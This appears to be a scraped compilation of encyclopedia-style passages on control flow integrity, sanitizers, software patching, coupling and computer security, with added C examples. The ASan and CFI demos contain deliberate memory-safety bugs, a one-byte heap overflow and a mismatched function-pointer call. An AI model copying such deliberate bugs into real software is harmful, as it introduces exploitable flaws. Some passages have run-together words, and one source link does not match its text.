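     * because the function pointer type does not match the target. */
    void_fn fp = (void_fn)add;
    fp();                                       /* CFI violation when enforced */

    printf("reached only without CFI enforcement\n");
    return 0;
}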
https://en.wikipedia.org/wiki/Control_flow_integrity
A code sanitizer is a programming tool that detects bugs in the form of undefined or suspicious behavior by having a compiler insert instrumentation code that performs checks at runtime. The class of tools was first introduced by Google's AddressSanitizer (or ASan) of 2012, which uses directly mapped shadow memory to detect memory corruption such as buffer overflows or accesses to a dangling pointer (use-after-free). Google's ASan, introduced in 2012, uses a shadow memory scheme to detect memory bugs, and is available in mainstream compilers, including Clang and GCC. On average, the instrumentation increases processing time by about 73% and memory usage by 240%.[5] There is a hardware-accelerated ASan called HWAsan available for AArch64 and (in a limited fashion) x86_64.[6] AddressSanitizer does not detect any uninitialized memory reads (but this is detected by MemorySanitizer[7]), and only detects some use-after-return bugs.[8] It is also not capable of detecting all arbitrary memory corruption bugs, nor all arbitrary write bugs due to integer underflows/overflows (when the integer with undefined behavior is used to calculate memory address offsets). Adjacent buffers in structs and classes are not protected from overflow, in part to prevent breaking backwards compatibility.[9] The KernelAddressSanitizer (KASan) detects dynamic memory errors in the Linux kernel.[10] Kernel instrumentation requires a special feature in the compiler supplying the -fsanitize=kernel-address command line option, since kernels do not use the same address space as normal programs.[11][12] KASan is also available for use with Windows kernel drivers beginning in Windows 11 22H2 and above.[13] Similarly to Linux, compiling a Windows driver with KASAN requires passing the /fsanitize=kernel-address command line option to the MSVC compiler. Google also produced LeakSanitizer (LSan, memory leaks), ThreadSanitizer (TSan, data races and deadlocks), MemorySanitizer (MSan, uninitialized memory), and UndefinedBehaviorSanitizer (UBSan, undefined behaviors, with fine-grained control).[14] These tools are generally available in Clang/LLVM and GCC.[15][16][17] Similar to KASan, there are kernel-specific versions of LSan, MSan and TSan, as well as completely original kernel sanitizers such as KFENCE and KCSan.[18] Additional sanitizer tools are grouped by compilers under -fsanitize or a similar flag.[15][16][17] A code sanitizer detects suspicious behavior as the program runs. One common way to use a sanitizer is to combine it with fuzzing, which generates inputs likely to trigger bugs.[21] Chromium and Firefox developers are active users of AddressSanitizer;[21][22] the tool has found hundreds of bugs in these web browsers.[23] A number of bugs were found in FFmpeg[24] and FreeType.[25] The Linux kernel has enabled the AddressSanitizer for the x86-64 architecture as of Linux version 4.0.
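A minimal example of the kind of bug AddressSanitizer reports is shown below; compiling it with the -fsanitize=address option (supported by Clang and GCC) and running it produces a heap-buffer-overflow report identifying the faulting line.

/* A one-byte heap buffer overflow of the kind AddressSanitizer reports.
 *
 *   clang -g -fsanitize=address asan_demo.c -o asan_demo && ./asan_demo
 *
 * ASan's shadow memory marks the redzone around the allocation as
 * unaddressable, so the out-of-bounds write below aborts with a
 * heap-buffer-overflow report pointing at this line. */
#include <stdlib.h>

int main(void) {
    char *buf = malloc(16);
    buf[16] = 'x';          /* one byte past the end of the allocation */
    free(buf);
    return 0;
}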
https://en.wikipedia.org/wiki/AddressSanitizer
Apatchisdatathat is intended to be used to modify an existing software resource such as aprogramor afile, often to fixbugsandsecurity vulnerabilities.[1][2]A patch may be created to improve functionality,usability, orperformance. A patch is typically provided by a vendor for updating the software that they provide. A patch may be created manually, but commonly it is created via a tool that compares two versions of the resource and generates data that can be used to transform one to the other. Typically, a patch needs to be applied to the specific version of the resource it is intended to modify, although there are exceptions. Some patching tools can detect the version of the existing resource and apply the appropriate patch, even if it supports multiple versions. As more patches are released, their cumulative size can grow significantly, sometimes exceeding the size of the resource itself. To manage this, the number of supported versions may be limited, or a complete copy of the resource might be provided instead. Patching allows for modifying acompiled(machine language) program when thesource codeis unavailable. This demands a thorough understanding of the inner workings of the compiled code, which is challenging without access to the source code. Patching also allows for making changes to a program without rebuilding it from source. For small changes, it can be more economical to distribute a patch than to distribute the complete resource. Although often intended to fix problems, a poorly designed patch can introduce new problems (seesoftware regressions). In some cases updates may knowingly break the functionality or disable a device, for instance, by removing components for which the update provider is no longer licensed.Patch managementis a part oflifecycle management, and is the process of using a strategy and plan of what patches should be applied to which systems at a specified time. Typically, a patch is applied viaprogrammed controltocomputer storageso that it is permanent. In some cases a patch is applied by aprogrammervia a tool such as adebuggertocomputer memoryin which case the change is lost when the resource is reloaded from storage. Patches forproprietary softwareare typically distributed asexecutable filesinstead ofsource code. When executed these files load a program into memory which manages the installation of the patch code into the target program(s) on disk. Patches for other software are typically distributed as data files containing the patch code. These are read by a patchutility programwhich performs the installation. This utility modifies the target program's executable file—the program'smachine code—typically by overwriting its bytes with bytes representing the new patch code. If the new code will fit in the space (number of bytes) occupied by the old code, it may be put in place by overwriting directly over the old code. This is called an inline patch. If the new code is bigger than the old code, the patch utility will append load record(s) containing the new code to the object file of the target program being patched. When the patched program is run, execution is directed to the new code with branch instructions (jumps or calls) patched over the place in the old code where the new code is needed. On early 8-bit microcomputers, for example the Radio ShackTRS-80, the operating system includes a PATCH/CMD utility which accepts patch data from a text file and applies the fixes to the target program's executable binary file(s). 
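As an illustration of the byte-overwrite step such utilities perform, the following C sketch applies an inline patch by seeking to an offset in the target file and overwriting bytes in place. The file name, offset, and replacement bytes are hypothetical placeholders, not data from any real patch.

/* Sketch of the byte-overwrite step performed by a simple patch utility:
 * seek to a known offset in the target file and replace bytes in place
 * (an "inline patch"). */
#include <stdio.h>

static int apply_inline_patch(const char *path, long offset,
                              const unsigned char *bytes, size_t len) {
    FILE *f = fopen(path, "r+b");               /* open for in-place update */
    if (!f) return -1;
    if (fseek(f, offset, SEEK_SET) != 0 ||
        fwrite(bytes, 1, len, f) != len) {
        fclose(f);
        return -1;
    }
    fclose(f);
    return 0;
}

int main(void) {
    const unsigned char new_bytes[] = { 0x90, 0x90 };   /* hypothetical fix */
    return apply_inline_patch("target.bin", 0x1234, new_bytes, sizeof new_bytes);
}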
The patch code must have place(s) in memory to be executed at runtime. Inline patches are no difficulty, but when additional memory space is needed the programmer must improvise. Naturally if the patch programmer is the one who first created the code to be patched, this is easier. Savvy programmers plan in advance for this need by reserving memory for later expansion, left unused when producing their final iteration. Other programmers not involved with the original implementation, seeking to incorporate changes at a later time, must find or make space for any additional bytes needed. The most fortunate possible circumstance for this is when the routine to be patched is a distinct module. In this case the patch programmer need merely adjust the pointers or length indicators that signal to other system components the space occupied by the module; he is then free to populate this memory space with his expanded patch code. If the routine to be patched does not exist as a distinct memory module, the programmer must find ways to shrink the routine to make enough room for the expanded patch code. Typical tactics include shortening code by finding more efficient sequences of instructions (or by redesigning with more efficient algorithms), compacting message strings and other data areas, externalizing program functions to mass storage (such as disk overlays), or removal of program features deemed less important than the changes to be installed with the patch. Small in-memory machine code patches can be manually applied with the system debug utility, such asCP/M's DDT orMS-DOS's DEBUG debuggers. Programmers working in interpretedBASICoften used the POKE command to alter the functionality of a system service routine or the interpreter itself. Patches can also circulate in the form of source code modifications. In this case, the patches usually consist of textual differences between two source code files, called "diffs". These types of patches commonly come out ofopen-source software projects. In these cases, developers expect users to compile the new or changed files themselves. Because the word "patch" carries the connotation of a small fix, large fixes may use different nomenclature. Bulky patches or patches that significantly change a program may circulate as "service packs" or as "software updates".Microsoft Windows NTand its successors (includingWindows 2000,Windows XP,Windows VistaandWindows 7) use the "service pack" terminology.[3]Historically,IBMused the terms "FixPaks" and "Corrective Service Diskette" to refer to these updates.[4] Historically, software suppliers distributed patches onpaper tapeor onpunched cards, expecting the recipient to cut out the indicated part of the original tape (or deck), and patch in (hence the name) the replacement segment. Later patch distributions used magnetic tape. Then, after the invention of removable disk drives, patches came from the software developer via adiskor, later,CD-ROMviamail. With widely availableInternetaccess,downloadingpatches from the developer'sweb siteor through automated software updates became often available to the end-users. Starting with Apple'sMac OS 9and Microsoft'sWindows ME, PC operating systems gained the ability to get automatic software updates via the Internet. Computer programs can often coordinate patches to update a target program. Automation simplifies the end-user's task – they need only to execute an update program, whereupon that program makes sure that updating the target takes place completely and correctly. 
Service packs forMicrosoft Windows NTand its successors and for many commercial software products adopt such automated strategies. Some programs can update themselves via theInternetwith very little or no intervention on the part of users. The maintenance ofserversoftware and ofoperating systemsoften takes place in this manner. In situations where system administrators control a number of computers, this sort of automation helps to maintain consistency. The application of security patches commonly occurs in this manner. With the advent of larger storage media and higher Internet bandwidth, it became common to replace entire files (or even all of a program's files) rather than modifying existing files, especially for smaller programs. The size of patches may vary from a fewbytesto hundreds ofmegabytes; thus, more significant changes imply a larger size, though this also depends on whether the patch includes entire files or only the changed portion(s) of files. In particular, patches can become quite large when the changes add or replace non-program data, such as graphics and sounds files. Such situations commonly occur in the patching ofcomputer games. Compared with the initial installation of software, patches usually do not take long to apply. In the case ofoperating systemsandcomputer serversoftware, patches have the particularly important role of fixing security holes. Some critical patches involve issues with drivers.[5]Patches may require prior application of other patches, or may require prior or concurrent updates of several independent software components. To facilitate updates, operating systems often provide automatic or semi-automatic updating facilities. Completely automatic updates have not succeeded in gaining widespread popularity in corporate computing environments, partly because of the aforementioned glitches, but also because administrators fear that software companies may gain unlimited control over their computers.[citation needed]Package management systemscan offer various degrees of patch automation. Usage of completely automatic updates has become far more widespread in the consumer market, due largely[citation needed]to the fact thatMicrosoft Windowsadded support for them[when?], andService Pack 2 of Windows XP(available in 2004) enabled them by default. Cautious users, particularly system administrators, tend to put off applying patches until they can verify the stability of the fixes. Microsoft(W)SUSsupports this. In the cases of large patches or of significant changes, distributors often limit availability of patches to qualified developers as abeta test. Applying patches tofirmwareposes special challenges, as it often involves the provisioning of totally new firmware images, rather than applying only the differences from the previous version. The patch usually consists of a firmware image in form of binary data, together with a supplier-provided special program that replaces the previous version with the new version; amotherboardBIOSupdate is an example of a common firmware patch. Any unexpected error or interruption during the update, such as a power outage, may render the motherboard unusable. It is possible for motherboard manufacturers to put safeguards in place to prevent serious damage; for example, the update procedure could make and keep a backup of the firmware to use in case it determines that the primary copy is corrupt (usually through the use of achecksum, such as aCRC). 
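The integrity check mentioned above can be as simple as a CRC comparison. The following C sketch (the image file name and expected value are placeholders) computes a standard reflected CRC-32 over a firmware image and refuses to proceed on a mismatch.

/* Sketch of a pre-flash integrity check: compute a standard reflected
 * CRC-32 (polynomial 0xEDB88320) over a firmware image and compare it with
 * an expected value. */
#include <stdint.h>
#include <stdio.h>

static uint32_t crc32_chunk(uint32_t crc, const uint8_t *data, size_t len) {
    /* 'crc' is the running value; initial and final XORs are done by the caller. */
    for (size_t i = 0; i < len; i++) {
        crc ^= data[i];
        for (int bit = 0; bit < 8; bit++)
            crc = (crc >> 1) ^ ((crc & 1u) ? 0xEDB88320u : 0u);
    }
    return crc;
}

int main(void) {
    const uint32_t expected = 0xDEADBEEFu;      /* placeholder expected CRC */
    FILE *f = fopen("firmware.img", "rb");      /* hypothetical image file */
    if (!f) { perror("fopen"); return 1; }

    uint8_t buf[4096];
    uint32_t crc = 0xFFFFFFFFu;                 /* standard initial value */
    size_t n;
    while ((n = fread(buf, 1, sizeof buf, f)) > 0)
        crc = crc32_chunk(crc, buf, n);
    fclose(f);
    crc ^= 0xFFFFFFFFu;                         /* final XOR */

    if (crc != expected) {
        fprintf(stderr, "firmware image failed CRC check (%08X)\n", (unsigned)crc);
        return 1;                               /* refuse to flash */
    }
    puts("firmware image verified");
    return 0;
}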
Video games receive patches to fix compatibility problems after their initial release just like any other software, but patches can also be applied to change game rules or algorithms. These patches may be prompted by the discovery of exploits in the multiplayer game experience that can be used to gain unfair advantages over other players. Extra features and gameplay tweaks can often be added. These kinds of patches are common in first-person shooters with multiplayer capability and in MMORPGs; because MMORPGs are typically very complex with large amounts of content, they almost always rely heavily on patches following the initial release, and these patches sometimes add new content and abilities available to players. Because the balance and fairness for all players of an MMORPG can be severely corrupted within a short amount of time by an exploit, servers of an MMORPG are sometimes taken down on short notice in order to apply a critical patch with a fix. Companies sometimes release games knowing that they have bugs. Computer Gaming World's Scorpia in 1994 denounced "companies—too numerous to mention—who release shoddy product knowing they can get by with patches and upgrades, and who make 'pay-testers' of their customers".[6] Patches sometimes become mandatory to fix problems with libraries or with portions of source code for programs in frequent use or in maintenance. This commonly occurs on very large-scale software projects, but rarely in small-scale development. In open-source projects, the authors commonly receive patches, or many people publish patches that fix particular problems or add certain functionality, like support for local languages outside the project's locale. In an example from the early development of the Linux kernel (noted for publishing its complete source code), Linus Torvalds, the original author, received hundreds of thousands of patches from many programmers to apply against his original version. The Apache HTTP Server originally evolved as a number of patches that Brian Behlendorf collated to improve NCSA HTTPd, hence a name that implies that it is a collection of patches ("a patchy server"). The FAQ on the project's official site states that the name 'Apache' was chosen out of respect for the Native American Apache tribe. However, the 'a patchy server' explanation was initially given on the project's website.[7] A hotfix or Quick Fix Engineering update (QFE update) is a single, cumulative package that includes information (often in the form of one or more files) that is used to address a problem in a software product (i.e., a software bug). Typically, hotfixes are made to address a specific customer situation. Microsoft once used this term but has stopped in favor of new terminology: General Distribution Release (GDR) and Limited Distribution Release (LDR). Blizzard Entertainment, however, defines a hotfix as "a change made to the game deemed critical enough that it cannot be held off until a regular content patch". A point release is a minor release of a software project, especially one intended to fix bugs or do small cleanups rather than add significant features. Often, there are too many bugs to be fixed in a single major or minor release, creating a need for a point release. Program temporary fix or Product temporary fix (PTF), depending on date, is the standard IBM terminology for a single bug fix, or group of fixes, distributed in a form ready to install for customers.
A PTF was sometimes referred to as a "ZAP".[8] Customers sometimes explain the acronym in a tongue-in-cheek manner as permanent temporary fix or, more practically, probably this fixes, because they have the option to make the PTF a permanent part of the operating system if the patch fixes the problem. A security patch is a change applied to an asset to correct the weakness described by a vulnerability. This corrective action will prevent successful exploitation and remove or mitigate a threat's capability to exploit a specific vulnerability in an asset. Patch management is a part of vulnerability management, the cyclical practice of identifying, classifying, remediating, and mitigating vulnerabilities. Security patches are the primary method of fixing security vulnerabilities in software. Currently Microsoft releases its security patches once a month ("Patch Tuesday"), and other operating systems and software projects have security teams dedicated to releasing the most reliable software patches as soon after a vulnerability announcement as possible. Security patches are closely tied to responsible disclosure. Such security patches are critical to ensure that business processes are not affected. In 2017, companies were struck by ransomware called WannaCry, which encrypts files on certain versions of Microsoft Windows and demands a ransom via Bitcoin. In response, Microsoft released patches that close the vulnerability the ransomware used to spread. A service pack (SP) or a feature pack (FP) comprises a collection of updates, fixes, or enhancements to a software program delivered in the form of a single installable package. Companies often release a service pack when the number of individual patches to a given program reaches a certain (arbitrary) limit, or when the software release has been shown to be stabilized with a limited number of remaining issues based on users' feedback and bug tracking such as Bugzilla. In large software applications such as office suites, operating systems, database software, or network management, it is not uncommon to have a service pack issued within the first year or two of a product's release. Installing a service pack is easier and less error-prone than installing many individual patches, even more so when updating multiple computers over a network, where service packs are common. An unofficial patch is a patch for a program written by a third party instead of the original developer. Similar to an ordinary patch, it alleviates bugs or shortcomings. Examples are security fixes by security specialists when an official patch by the software producer itself takes too long.[9][10] Other examples are unofficial patches created by the game community of a video game which became unsupported.[11][12] Monkey patching means extending or modifying a program locally (affecting only the running instance of the program). Hot patching, also known as live patching or dynamic software updating, is the application of patches without shutting down and restarting the system or the program concerned. This addresses problems related to the unavailability of the service provided by the system or the program.[13] This method can be used to update the Linux kernel without stopping the system.[14][15] A patch that can be applied in this way is called a hot patch or a live patch.
This is becoming a common practice in the mobile app space.[16] Companies like Rollout.io use method swizzling to deliver hot patches to the iOS ecosystem.[17] Another method for hot-patching iOS apps is JSPatch.[18] Cloud providers often use hot patching to avoid downtime for customers when updating underlying infrastructure.[19] In computing, slipstreaming is the act of integrating patches (including service packs) into the installation files of their original app, so that the result allows a direct installation of the updated app.[20][21] The nature of slipstreaming means that it involves an initial outlay of time and work, but can save a lot of time (and, by extension, money) in the long term. This is especially significant for administrators that are tasked with managing a large number of computers, where typical practice for installing an operating system on each computer would be to use the original media and then update each computer after the installation was complete. This would take a lot more time than starting with a more up-to-date (slipstreamed) source and needing to download and install only the few updates not included in the slipstreamed source. However, not all patches can be applied in this fashion, and one disadvantage is that if it is discovered that a certain patch is responsible for later problems, said patch cannot be removed without using an original, non-slipstreamed installation source. Software update systems allow for updates to be managed by users and software developers. In the 2017 Petya cyberpandemic, the financial software "MeDoc"'s update system is said to have been compromised to spread malware via its updates.[22][23] On the Tor Blog, cybersecurity expert Mike Perry states that deterministic, distributed builds are likely the only way to defend against malware that attacks the software development and build processes to infect millions of machines in a single, officially signed, instantaneous update.[24] Update managers also allow for security updates to be applied quickly and widely. Update managers of Linux such as Synaptic allow users to update all software installed on their machine. Applications like Synaptic use cryptographic checksums to verify source/local files before they are applied, to help ensure that they have not been tampered with by malware.[25][26] Hackers may also compromise a legitimate software update channel and inject malicious code.[27]
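As a sketch of the checksum verification step an update manager can perform, the following C program (assuming OpenSSL's libcrypto is available; the package name and expected digest are placeholders) computes the SHA-256 of a downloaded file with the EVP interface and compares it to an expected value before installation would proceed.

/* Sketch of an update manager's checksum check using OpenSSL's EVP API:
 * hash the downloaded package with SHA-256 and compare against the digest
 * published by the repository. Build with: cc verify.c -lcrypto -o verify */
#include <openssl/evp.h>
#include <stdio.h>
#include <string.h>

int main(void) {
    const char *expected_hex =      /* placeholder: the repository's digest */
        "0000000000000000000000000000000000000000000000000000000000000000";

    FILE *f = fopen("package.deb", "rb");       /* hypothetical download */
    if (!f) { perror("fopen"); return 1; }

    EVP_MD_CTX *ctx = EVP_MD_CTX_new();
    EVP_DigestInit_ex(ctx, EVP_sha256(), NULL);

    unsigned char buf[4096];
    size_t n;
    while ((n = fread(buf, 1, sizeof buf, f)) > 0)
        EVP_DigestUpdate(ctx, buf, n);
    fclose(f);

    unsigned char digest[EVP_MAX_MD_SIZE];
    unsigned int dlen = 0;
    EVP_DigestFinal_ex(ctx, digest, &dlen);
    EVP_MD_CTX_free(ctx);

    char hex[2 * EVP_MAX_MD_SIZE + 1];
    for (unsigned int i = 0; i < dlen; i++)
        sprintf(hex + 2 * i, "%02x", digest[i]);

    if (strcmp(hex, expected_hex) != 0) {
        fprintf(stderr, "checksum mismatch; refusing to install\n");
        return 1;
    }
    puts("checksum verified");
    return 0;
}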
https://en.wikipedia.org/wiki/Software_update
In software engineering, coupling is the degree of interdependence between software modules, a measure of how closely connected two routines or modules are,[1] and the strength of the relationships between modules.[2] Coupling is not binary but multi-dimensional.[3] Coupling is usually contrasted with cohesion. Low coupling often correlates with high cohesion, and vice versa. Low coupling is often thought to be a sign of a well-structured computer system and a good design, and when combined with high cohesion, supports the general goals of high readability and maintainability.[citation needed] The software quality metrics of coupling and cohesion were invented by Larry Constantine in the late 1960s as part of structured design, based on characteristics of "good" programming practices that reduced maintenance and modification costs. Structured design, including cohesion and coupling, was published in the article Stevens, Myers & Constantine (1974)[4] and the book Yourdon & Constantine (1979),[5] and the latter terms subsequently became standard. Coupling can be "low" (also "loose" and "weak") or "high" (also "tight" and "strong"), and the various types of coupling are conventionally ranked from highest to lowest coupling. A module here refers to a subroutine of any kind, i.e. a set of one or more statements having a name and preferably its own set of variable names. In recent work various other coupling concepts have been investigated and used as indicators for different modularization principles used in practice.[7] The goal of defining and measuring dynamic coupling is to provide a run-time evaluation of a software system. It has been argued that static coupling metrics lose precision when dealing with an intensive use of dynamic binding or inheritance.[8] In the attempt to solve this issue, dynamic coupling measures have been taken into account. Semantic (or conceptual) coupling metrics, by contrast, consider the conceptual similarities between software entities using, for example, comments and identifiers and relying on techniques such as latent semantic indexing (LSI). Logical coupling (or evolutionary coupling or change coupling) analysis exploits the release history of a software system to find change patterns among modules or classes: e.g., entities that are likely to be changed together or sequences of changes (a change in a class A is always followed by a change in a class B). According to Gregor Hohpe, coupling is multi-dimensional.[3] Tightly coupled systems tend to exhibit developmental characteristics that are often seen as disadvantages: a change in one module usually forces a ripple effect of changes in other modules, assembly of modules may require more effort and time because of the increased inter-module dependencies, and a particular module may be harder to reuse or test because dependent modules must be included. Whether loosely or tightly coupled, a system's performance is often reduced by message and parameter creation, transmission, translation (e.g. marshaling) and message interpretation (which might be a reference to a string, array or data structure); a simple reference of this kind requires less overhead than creating and parsing a complicated message such as a SOAP message. Longer messages require more CPU and memory to produce. To optimize runtime performance, message length must be minimized and message meaning must be maximized. One approach to decreasing coupling is functional design, which seeks to limit the responsibilities of modules along functionality. Coupling increases between two classes A and B if, for example, A has an attribute that refers to B, A calls services of an object B, A has a method that references B (via a return type or parameter), or A is a subclass of (or implements) class B. Low coupling refers to a relationship in which one module interacts with another module through a simple and stable interface and does not need to be concerned with the other module's internal implementation (see Information Hiding).
Systems such asCORBAorCOMallow objects to communicate with each other without having to know anything about the other object's implementation. Both of these systems even allow for objects to communicate with objects written in other languages. Coupling describes the degree and nature of dependency between software components, focusing on what they share (e.g., data, control flow, technology) and how tightly they are bound. It evaluates two key dimensions: strength, which measures how difficult it is to change the dependency, and scope (or visibility), which indicates how widely the dependency is exposed across modules or boundaries. Traditional coupling types typically include content coupling, common coupling, control coupling, stamp coupling, external coupling, and data coupling.[9][10][11] Connascence, introduced by Meilir Page-Jones, provides a systematic framework for analyzing and measuring coupling dependencies. It evaluates dependencies based on three dimensions: strength, which measures the effort required to refactor or modify the dependency; locality, which considers how physically or logically close dependent components are in the codebase; and degree, which measures how many components are affected by the dependency. Connascence can be categorized into static (detectable at compile-time) and dynamic (detectable at runtime) forms. Static connascence refers to compile-time dependencies, such as method signatures, while dynamic connascence refers to runtime dependencies, which can manifest in forms like connascence of timing, values, or algorithm.[9][10][11] Each coupling flavor can exhibit multiple types of connascence, a specific type, or, in rare cases, none at all, depending on how the dependency is implemented. Common types of connascence include connascence of name, type, position, and meaning. Certain coupling types naturally align with specific connascence types; for example, data coupling often involves connascence of name or type. However, not every combination of coupling and connascence is practically meaningful. Dependencies relying on parameter order in a method signature demonstrate connascence of position, which is fragile and difficult to refactor because reordering parameters breaks the interface. In contrast, connascence of name, which relies on field or parameter names, is generally more resilient to change. Connascence types themselves exhibit a natural hierarchy of strength, with connascence of name typically considered weaker than connascence of meaning.[9][10][11] Dependencies spanning module boundaries or distributed systems typically have higher coordination costs, increasing the difficulty of refactoring and propagating changes across distant boundaries. Modern practices, such as dependency injection and interface-based programming, are often employed to reduce coupling strength and improve the maintainability of dependencies.[9][10][11] While coupling identifies what is shared between components, connascence evaluates how those dependencies behave, how changes propagate, and how difficult they are to refactor. Strength, locality, and degree are interrelated; dependencies with high strength, wide scope, and spanning distant boundaries are significantly harder to refactor and maintain. 
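The difference between connascence of position and connascence of name discussed above can be illustrated with a small C sketch (the window-creation functions are hypothetical). Both callers are coupled to the callee, but only the positional variant silently changes meaning if the parameter order is ever reordered.

/* Connascence of position versus connascence of name. Both callers are
 * coupled to the window-creation routine, but the positional variant
 * silently changes meaning if the parameter order is ever reordered,
 * while the struct-based variant depends only on field names. */
#include <stdio.h>

/* Positional interface: callers share connascence of position. */
static void create_window_pos(int x, int y, int width, int height) {
    printf("window at (%d,%d), %dx%d\n", x, y, width, height);
}

/* Name-based interface: callers share only connascence of name. */
struct window_opts { int x, y, width, height; };

static void create_window(const struct window_opts *o) {
    printf("window at (%d,%d), %dx%d\n", o->x, o->y, o->width, o->height);
}

int main(void) {
    create_window_pos(10, 20, 640, 480);        /* meaning tied to argument order */

    create_window(&(struct window_opts){        /* meaning tied to field names */
        .x = 10, .y = 20, .width = 640, .height = 480 });
    return 0;
}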
Taken together, coupling provides a high-level overview of dependency relationships, while connascence offers a granular framework for analyzing dependency strength, locality, degree, and resilience to change, supporting the design of maintainable and robust systems.[9][10][11] Coupling and cohesion are terms which occur together very frequently. Coupling refers to the interdependencies between modules, while cohesion describes how related the functions within a single module are. Low cohesion implies that a given module performs tasks which are not very related to each other and hence can create problems as the module becomes large. Coupling in Software Engineering[12] describes a version of metrics associated with this concept. The metric counts, for data and control flow coupling, the number of input data parameters (d_i), input control parameters (c_i), output data parameters (d_o) and output control parameters (c_o); for global coupling, the number of global variables used as data (g_d) and as control (g_c); and for environmental coupling, the number of other modules called and the number of modules calling the module under consideration (its fan-out and fan-in, denoted w and r). The coupling of a module is then {\displaystyle \mathrm {Coupling} (C)=1-{\frac {1}{d_{i}+2\times c_{i}+d_{o}+2\times c_{o}+g_{d}+2\times g_{c}+w+r}}} The metric assigns larger values to more tightly coupled modules. This number ranges from approximately 0.67 (low coupling) to 1.0 (highly coupled). For example, if a module has only a single input and output data parameter, {\displaystyle C=1-{\frac {1}{1+0+1+0+0+0+1+0}}=1-{\frac {1}{3}}\approx 0.67} If a module has 5 input and output data parameters, an equal number of control parameters, and accesses 10 items of global data, with a fan-in of 3 and a fan-out of 4, {\displaystyle C=1-{\frac {1}{5+2\times 5+5+2\times 5+10+0+3+4}}\approx 0.98}
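A small C helper reproducing the two worked examples above may make the metric easier to experiment with; the parameter names mirror the symbols in the formula (do_ is used because "do" is a C keyword).

/* Helper that evaluates the coupling metric quoted above. The two calls
 * reproduce the worked examples from the text. */
#include <stdio.h>

static double coupling(int di, int ci, int do_, int co,
                       int gd, int gc, int w, int r) {
    int denom = di + 2 * ci + do_ + 2 * co + gd + 2 * gc + w + r;
    return 1.0 - 1.0 / denom;
}

int main(void) {
    /* First worked example: a single input and output data parameter. */
    printf("C = %.2f\n", coupling(1, 0, 1, 0, 0, 0, 1, 0));   /* ~0.67 */

    /* Second worked example: 5 data and 5 control parameters in and out,
     * 10 global data items, fan-in 3 and fan-out 4. */
    printf("C = %.2f\n", coupling(5, 5, 5, 5, 10, 0, 3, 4));  /* ~0.98 */
    return 0;
}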
https://en.wikipedia.org/wiki/Software_dependency
Computer security(alsocybersecurity,digital security, orinformation technology (IT) security) is a subdiscipline within the field ofinformation security. It consists of the protection ofcomputer software,systemsandnetworksfromthreatsthat can lead to unauthorized information disclosure, theft or damage tohardware,software, ordata, as well as from the disruption or misdirection of theservicesthey provide.[1][2] The significance of the field stems from the expanded reliance oncomputer systems, theInternet,[3]andwireless network standards. Its importance is further amplified by the growth ofsmart devices, includingsmartphones,televisions, and the various devices that constitute theInternet of things(IoT). Cybersecurity has emerged as one of the most significant new challenges facing the contemporary world, due to both the complexity ofinformation systemsand the societies they support. Security is particularly crucial for systems that govern large-scale systems with far-reaching physical effects, such aspower distribution,elections, andfinance.[4][5] Although many aspects of computer security involve digital security, such as electronicpasswordsandencryption,physical securitymeasures such asmetal locksare still used to prevent unauthorized tampering. IT security is not a perfect subset ofinformation security, therefore does not completely align into thesecurity convergenceschema. A vulnerability refers to a flaw in the structure, execution, functioning, or internal oversight of a computer or system that compromises its security. Most of the vulnerabilities that have been discovered are documented in theCommon Vulnerabilities and Exposures(CVE) database.[6]Anexploitablevulnerability is one for which at least one workingattackorexploitexists.[7]Actors maliciously seeking vulnerabilities are known asthreats. Vulnerabilities can be researched, reverse-engineered, hunted, or exploited usingautomated toolsor customized scripts.[8][9] Various people or parties are vulnerable to cyber attacks; however, different groups are likely to experience different types of attacks more than others.[10] In April 2023, theUnited KingdomDepartment for Science, Innovation & Technology released a report on cyber attacks over the previous 12 months.[11]They surveyed 2,263 UK businesses, 1,174 UK registered charities, and 554 education institutions. The research found that "32% of businesses and 24% of charities overall recall any breaches or attacks from the last 12 months." These figures were much higher for "medium businesses (59%), large businesses (69%), and high-income charities with £500,000 or more in annual income (56%)."[11]Yet, although medium or large businesses are more often the victims, since larger companies have generally improved their security over the last decade,small and midsize businesses(SMBs) have also become increasingly vulnerable as they often "do not have advanced tools to defend the business."[10]SMBs are most likely to be affected by malware, ransomware, phishing,man-in-the-middle attacks, and Denial-of Service (DoS) Attacks.[10] Normal internet users are most likely to be affected by untargeted cyberattacks.[12]These are where attackers indiscriminately target as many devices, services, or users as possible. They do this using techniques that take advantage of the openness of the Internet. 
These strategies mostly include phishing, ransomware, water holing and scanning.[12] To secure a computer system, it is important to understand the attacks that can be made against it, and these threats can typically be classified into one of the categories described below. A backdoor in a computer system, a cryptosystem, or an algorithm is any secret method of bypassing normal authentication or security controls. These weaknesses may exist for many reasons, including original design or poor configuration.[13] Due to the nature of backdoors, they are of greater concern to companies and databases as opposed to individuals. Backdoors may be added by an authorized party to allow some legitimate access, or by an attacker for malicious reasons. Criminals often use malware to install backdoors, giving them remote administrative access to a system.[14] Once they have access, cybercriminals can "modify files, steal personal information, install unwanted software, and even take control of the entire computer."[14] Backdoors can be difficult to detect, as they often remain hidden within the source code or system firmware, and discovering them may require intimate knowledge of the operating system of the computer. Denial-of-service attacks (DoS) are designed to make a machine or network resource unavailable to its intended users.[15] Attackers can deny service to individual victims, such as by deliberately entering a wrong password enough consecutive times to cause the victim's account to be locked, or they may overload the capabilities of a machine or network and block all users at once. While a network attack from a single IP address can be blocked by adding a new firewall rule, many forms of distributed denial-of-service (DDoS) attacks are possible, where the attack comes from a large number of points. In this case, defending against these attacks is much more difficult. Such attacks can originate from the zombie computers of a botnet or from a range of other possible techniques, including distributed reflective denial-of-service (DRDoS), where innocent systems are fooled into sending traffic to the victim.[15] With such attacks, the amplification factor makes the attack easier for the attacker because they have to use little bandwidth themselves. To understand why attackers may carry out these attacks, see the 'attacker motivation' section. A direct-access attack is when an unauthorized user (an attacker) gains physical access to a computer, most likely to directly copy data from it or steal information.[16] Attackers may also compromise security by making operating system modifications, installing software worms, keyloggers, covert listening devices or using wireless microphones. Even when the system is protected by standard security measures, these may be bypassed by booting another operating system or tool from a CD-ROM or other bootable media. Disk encryption and the Trusted Platform Module standard are designed to prevent these attacks. Direct-access attacks are related in concept to direct memory access attacks, which allow an attacker to gain direct access to a computer's memory.[17] The attacks "take advantage of a feature of modern computers that allows certain devices, such as external hard drives, graphics cards, or network cards, to access the computer's memory directly."[17] Eavesdropping is the act of surreptitiously listening to a private computer conversation (communication), usually between hosts on a network.
